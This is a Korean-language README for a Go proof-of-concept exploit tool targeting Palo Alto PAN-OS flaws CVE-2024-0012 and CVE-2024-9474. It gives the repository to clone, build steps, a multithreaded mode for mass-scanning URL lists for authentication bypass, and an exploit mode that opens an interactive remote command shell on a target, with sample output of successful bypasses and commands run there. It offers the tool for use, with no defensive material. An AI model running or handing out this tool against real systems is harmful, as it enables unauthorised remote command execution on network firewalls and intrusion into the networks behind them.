
Palo Alto RCE 취약점
이 스크립트는 Palo Alto PAN-OS에서 발견된 취약점(CVE-2024-0012 및 CVE-2024-9474)에 대한 PoC(Proof of Concept) 익스플로잇입니다. 이 스크립트는 URL 목록을 스캔하여 취약점을 탐지하거나, 단일 취약한 URL을 대화식으로 익스플로잇하는 데 사용할 수 있습니다.
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: 스캔 상태를 표시하는 진행률 표시줄. github.com/gookit/color: 콘솔 출력을 위한 향상된 색상 지원. github.com/manifoldco/promptui: 대화식 명령줄 프롬프트. github.com/p0dalirius/goopts/parser: 명령줄 인수 구문 분석.
스캔 모드는 여러 URL의 취약점을 확인하는 데 사용됩니다. URL 목록이 포함된 파일을 제공해야 합니다.
go run main.go --file urls.txt --output results.txt --threads 100
--file: 스캔할 URL 목록이 포함된 파일의 경로. --output: 스캔 결과를 저장할 경로 (기본값: output.txt). --threads: 스캔에 사용할 동시 스레드 수 (기본값: 200).
http://example1.com
http://example2.com
go run main.go --url http://target.com --output results.txt
--url: 익스플로잇할 대상 URL. --output: 익스플로잇 결과를 저장할 경로. 익스플로잇 모드에 진입하면 대상 시스템에서 실행할 명령을 입력할 수 있습니다. 대화식 셸을 종료하려면 exit를 입력하세요.
도움말 정보를 표시하려면:
go run main.go --help
스캔이 완료되면 결과가 지정된 출력 파일(예: results.txt)에 저장됩니다:
[+] http://example1.com - Auth Bypass successful
[+] http://example2.com - Auth Bypass successful
URL을 익스플로잇할 때, 명령 출력은 대상에서 명령을 실행한 후에 표시됩니다:
# ls /var
bin app lib tmp
# exit
[+] Exiting interactive shell.
명령줄 인수 Flag Description Default Value --url 익스플로잇 모드에서 익스플로잇할 URL --file 스캔할 URL이 포함된 파일 (스캔 모드에서 사용) --output 결과 저장을 위한 출력 파일 output.txt --threads 스캔을 위한 동시 스레드 수 (스캔 모드) 200 --help 도움말 메시지 표시
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.